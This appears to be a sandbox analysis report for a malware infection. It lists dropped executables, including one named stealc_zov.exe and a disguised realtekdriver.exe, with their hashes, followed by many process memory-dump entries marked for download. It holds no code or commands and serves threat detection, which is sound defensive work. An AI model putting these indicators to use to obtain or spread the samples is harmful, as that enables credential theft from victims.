ca7616c052d72b4e1a750ce2996f7c5ce49193307d83e3aeab30c996306c90d7127cde9c4c7ce1151a01f32aff02bac45a90b218ae5b1b783e5b4b1e347ac32d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000116001\FILE1.exe
Filesize
26KB

MD5
a8bc178b9c6b03fbdea6d742e11ea3ae

SHA1
6090087f5a820a2b269b780482a00bd63edbce68

SHA256
248ce8ab3da7891872b69e45c61c6cb563f0b7598089e4a3e09f0b70be38418f

SHA512
a5345fd8c8446f60703baa6348311fb35a9d98b11fad5f39ba5142362d2e44a7ab4bd34834ebdf12d7d3eeb92cb425df717387612cd2ae005f13598cb1d02840

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000125001\Freshbuild.exe
Filesize
415KB

MD5
07101cac5b9477ba636cd8ca7b9932cb

SHA1
59ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1

SHA256
488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77

SHA512
02240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exe
Filesize
512KB

MD5
a957dc16d684fbd7e12fc87e8ee12fea

SHA1
20c73ccfdba13fd9b79c9e02432be39e48e4b37d

SHA256
071b6c448d2546dea8caed872fca0d002f59a6b9849f0de2a565fc74b487fa37

SHA512
fd6982587fba779d6febb84dfa65ec3e048e17733c2f01b61996bedb170bb4bb1cbb822c0dd2cf44a7e601373abaf499885b13b7957dd2a307bbd8f2120e9b3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe
Filesize
297KB

MD5
0970456d2e2bcb36f49d23f5f2eec4ce

SHA1
1e427bbeb209b636371d17801b14fabff87921be

SHA256
264db4d677606c95912a93a457675d5ebaa24dc886da8bbcb800fe831c540a54

SHA512
43c233e6c6fb20ee5830672f68eec2a1930aff6c3da185b7af56ede90970041157755b8893a86336711c8ba8cbe3f22818de8ddc1789ed65a7aacd596771909e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exe
Filesize
158KB

MD5
253ccac8a47b80287f651987c0c779ea

SHA1
11db405849dbaa9b3759de921835df20fab35bc3

SHA256
262a400b339deea5089433709ce559d23253e23d23c07595b515755114147e2f

SHA512
af40e01bc3d36baf47eba1d5d6406220dfbcc52c6123dd8450e709fed3e72bed82aac6257fa7bdf7dd774f182919a5051e9712b2e7f1329defd0b159cb08385d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe
Filesize
297KB

MD5
9ab4de8b2f2b99f009d32aa790cd091b

SHA1
a86b16ee4676850bac14c50ee698a39454d0231e

SHA256
8a254344702dc6560312a8028e08f844b16804b1fbf4c438c3ca5058d7b65ea1

SHA512
a79341ec3407529daa0384de4cac25b665d3b0cb81e52ecada0ebfe37d7616b16da96b47b04f50ce0a6e46d5fced3298a459f78a087c6b6eac4ed444434c5fbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exe
Filesize
2.1MB

MD5
662404ed188bfab5386fc73a0a7732d4

SHA1
79ccf9c9015384fe6d7b0245720a2a59a27cebfb

SHA256
601c31115b7c8db7e45d8a4386252f8b4a09d49b7d55eb25c9c49932828d718c

SHA512
ae90c377177528db849026192e93b0558e0ea5e84953b61e591910c69d2453f5fb73cc431853531bbf6a5c33e2a711620ca6e8e6f061eab7f93f5a8f1caf46d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
Filesize
1.9MB

MD5
eaa443f37443cb7221d63e0891243384

SHA1
d3242326b2ac1ae6e9817a49df33c3a79e209aee

SHA256
bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13

SHA512
8405c44c1eea8578224eb6495f689d66e4e2f6503c0bf08d3c111e4e307603a35089649296ebf89b76d339c9517a83133b741c655097a9fe319f25aae1f6afdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jafjjtuv.faa.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
\Users\Admin\AppData\Roaming\d3d9.dll
Filesize
279KB

MD5
8fa26f1e37d3ff7f736fc93d520bc8ab

SHA1
ad532e1cb4a1b3cd82c7a85647f8f6dd99833bb1

SHA256
6c47da8fbd12f22d7272fbf223e054bf5093c0922d0e8fb7d6289a5913c2e45d

SHA512
8a0b53cbc3a20e2f0fd41c486b1af1fbbcf7f2fed9f7368b672a07f25faaa2568bbdbcf0841233ac8c473a4d1dee099e90bf6098a6fa15e44b8526efdafc1287

Download Submit
memory/64-5394-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/64-5396-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/924-68-0x0000000002500000-0x000000000273C000-memory.dmp

Filesize
2.2MB

Download
memory/924-70-0x0000000002500000-0x000000000273C000-memory.dmp

Filesize
2.2MB

Download
memory/924-74-0x0000000002500000-0x000000000273C000-memory.dmp

Filesize
2.2MB

Download
memory/1628-5430-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/1628-5432-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/1756-204-0x00007FF7B0FF0000-0x00007FF7B1686000-memory.dmp

Filesize
6.6MB

Download
memory/2244-61-0x0000000000A70000-0x0000000000BA2000-memory.dmp

Filesize
1.2MB

Download
memory/2272-0-0x0000000000B20000-0x0000000000FF1000-memory.dmp

Filesize
4.8MB

Download
memory/2272-15-0x0000000000B20000-0x0000000000FF1000-memory.dmp

Filesize
4.8MB

Download
memory/2272-5-0x0000000000B20000-0x0000000000FF1000-memory.dmp

Filesize
4.8MB

Download
memory/2272-3-0x0000000000B20000-0x0000000000FF1000-memory.dmp

Filesize
4.8MB

Download
memory/2272-2-0x0000000000B21000-0x0000000000B4F000-memory.dmp

Filesize
184KB

Download
memory/2272-1-0x00000000779B4000-0x00000000779B5000-memory.dmp

Filesize
4KB

Download
memory/3356-5096-0x0000000008380000-0x0000000008542000-memory.dmp

Filesize
1.8MB

Download
memory/3356-129-0x00000000052A0000-0x0000000005332000-memory.dmp

Filesize
584KB

Download
memory/3356-142-0x0000000007E20000-0x0000000007E5E000-memory.dmp

Filesize
248KB

Download
memory/3356-143-0x00000000088B0000-0x00000000088FB000-memory.dmp

Filesize
300KB

Download
memory/3356-401-0x0000000006090000-0x00000000060F6000-memory.dmp

Filesize
408KB

Download
memory/3356-132-0x0000000007EA0000-0x0000000007FAA000-memory.dmp

Filesize
1.0MB

Download
memory/3356-5095-0x0000000005E40000-0x0000000005E90000-memory.dmp

Filesize
320KB

Download
memory/3356-127-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/3356-131-0x0000000006630000-0x0000000006C36000-memory.dmp

Filesize
6.0MB

Download
memory/3356-130-0x0000000005260000-0x000000000526A000-memory.dmp

Filesize
40KB

Download
memory/3356-5097-0x0000000008F40000-0x000000000946C000-memory.dmp

Filesize
5.2MB

Download
memory/3356-133-0x0000000007DC0000-0x0000000007DD2000-memory.dmp

Filesize
72KB

Download
memory/3356-128-0x00000000057A0000-0x0000000005C9E000-memory.dmp

Filesize
5.0MB

Download
memory/4036-203-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/4036-205-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/4036-16-0x00000000001F1000-0x000000000021F000-memory.dmp

Filesize
184KB

Download
memory/4036-17-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/4036-18-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/4036-48-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/4036-14-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/4036-172-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/4272-148-0x0000000000AE0000-0x0000000000B30000-memory.dmp

Filesize
320KB

Download
memory/4408-5425-0x0000000000A90000-0x0000000000CCC000-memory.dmp

Filesize
2.2MB

Download
memory/4408-173-0x0000000000A90000-0x0000000000CCC000-memory.dmp

Filesize
2.2MB

Download
memory/4668-226-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-252-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-264-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-262-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-260-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-258-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-256-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-254-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-250-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-248-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-246-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-244-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-238-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-230-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-228-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-268-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-224-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-242-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-240-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-236-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-234-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-232-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-270-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-5090-0x0000000007270000-0x00000000072BC000-memory.dmp

Filesize
304KB

Download
memory/4668-5089-0x0000000007210000-0x000000000726A000-memory.dmp

Filesize
360KB

Download
memory/4668-274-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-272-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-266-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-218-0x0000000000F30000-0x0000000001156000-memory.dmp

Filesize
2.1MB

Download
memory/4668-219-0x0000000005B00000-0x0000000005D1A000-memory.dmp

Filesize
2.1MB

Download
memory/4668-5109-0x0000000007DB0000-0x0000000007E04000-memory.dmp

Filesize
336KB

Download
memory/4668-220-0x0000000006E50000-0x000000000706C000-memory.dmp

Filesize
2.1MB

Download
memory/4668-222-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4668-221-0x0000000006E50000-0x0000000007065000-memory.dmp

Filesize
2.1MB

Download
memory/4908-198-0x00000000004E0000-0x0000000000530000-memory.dmp

Filesize
320KB

Download
memory/5708-5345-0x0000000009BC0000-0x0000000009BDA000-memory.dmp

Filesize
104KB

Download
memory/5708-5151-0x0000000009A50000-0x0000000009AF5000-memory.dmp

Filesize
660KB

Download
memory/5708-5152-0x0000000009C20000-0x0000000009CB4000-memory.dmp

Filesize
592KB

Download
memory/5708-5122-0x0000000007E30000-0x0000000007E52000-memory.dmp

Filesize
136KB

Download
memory/5708-5144-0x0000000009920000-0x0000000009953000-memory.dmp

Filesize
204KB

Download
memory/5708-5145-0x000000006E9A0000-0x000000006E9EB000-memory.dmp

Filesize
300KB

Download
memory/5708-5146-0x00000000098E0000-0x00000000098FE000-memory.dmp

Filesize
120KB

Download
memory/5708-5124-0x0000000008140000-0x0000000008490000-memory.dmp

Filesize
3.3MB

Download
memory/5708-5126-0x00000000088B0000-0x0000000008926000-memory.dmp

Filesize
472KB

Download
memory/5708-5125-0x0000000008530000-0x000000000854C000-memory.dmp

Filesize
112KB

Download
memory/5708-5121-0x0000000007800000-0x0000000007E28000-memory.dmp

Filesize
6.2MB

Download
memory/5708-5350-0x0000000009BB0000-0x0000000009BB8000-memory.dmp

Filesize
32KB

Download
memory/5708-5120-0x0000000007090000-0x00000000070C6000-memory.dmp

Filesize
216KB

Download
memory/5708-5123-0x0000000008060000-0x00000000080C6000-memory.dmp

Filesize
408KB

Download
memory/5776-5447-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/5928-5414-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/5928-5412-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/6064-5105-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download
memory/6064-5103-0x00000000001F0000-0x00000000006C1000-memory.dmp

Filesize
4.8MB

Download